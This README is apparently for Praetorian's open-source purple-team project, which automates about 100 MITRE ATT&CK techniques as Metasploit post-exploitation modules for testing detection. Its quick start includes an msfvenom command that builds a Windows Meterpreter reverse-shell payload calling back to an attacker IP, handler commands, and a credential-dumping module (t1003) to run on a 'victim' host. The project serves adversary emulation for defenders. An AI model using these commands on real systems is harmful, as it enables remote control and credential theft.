Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
The Metasploit Framework is released under a BSD-style license. See
COPYING for more details.
At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post
modules. As of this release, we’ve automated a little over 100 TTPs as modules.
Metasploit’s advantage is its robust library, capability to interact with operating system APIs, and its flexible license. In addition, we’re able to emulate the features of other tools such as in-memory .NET execution via leveraging Metasploit’s execute_powershell
functionality. This allows Blue Teams to ensure that their tools are alerting on the actual TTP behavior and not execution artifacts (such as encoded PowerShell).
Our solution is built on top of the latest version of Metasploit as of 09Apr2019 (pulled from: https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.
We’re open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.
For detailed opertional usage guidance and a full list of modules and changes, please view the GitHub Wiki.
Quick start video guide: https://youtu.be/o3Qb_0clIpg
Installation should follow the instructions for installing a Metasploit Docker environment:
https://github.com/rapid7/metasploit-framework/tree/master/docker
In general:
git clone https://github.com/praetorian-code/purple-team-attack-automation.git
./docker-compose.local.override.yml
to reflect the LHOST of your local system similar to below. By default, port 4444 will be forwarded to the docker container. If you want to use other ports, for instance to mirror HTTPS, you’ll have to add them to this file.version: '3'
services:
ms:
environment:
# example of setting LHOST
LHOST: 10.0.8.2
# example of adding more ports
ports:
- 8080:8080
- 443:443
LHOST
to valid hostname that resolves to your host machine.COMPOSE_FILE
environment variable to load your local override.echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
docker-compose build
./docker/bin/msfconsole
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacker IP Address>
set LPORT 4444
exploit -j -z
Copy and run meterpreter.exe on the target (“victim”) host as admin and wait for a session.
use modules/post/windows/purple/t1003
info
set session 1
run
Praetorian recommends you utilize the nightly installers in order to run msfvenom to create your payloads.
ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?
Solved by
service docker start
If you’re interested in our Purple Team services, please contact us online or read more about “Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too”.
If you’re an engineer looking to join our great team, we have openings at our careers page.
See the Contribution Guide for a step-by-step guide to making a module.
Also, follow the Metasploit Framework’s general contributing guidelines.
We’d like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.
At Praetorian, the following engineers helped contribute modules:
jabra [at] spl0it.org
and @jabra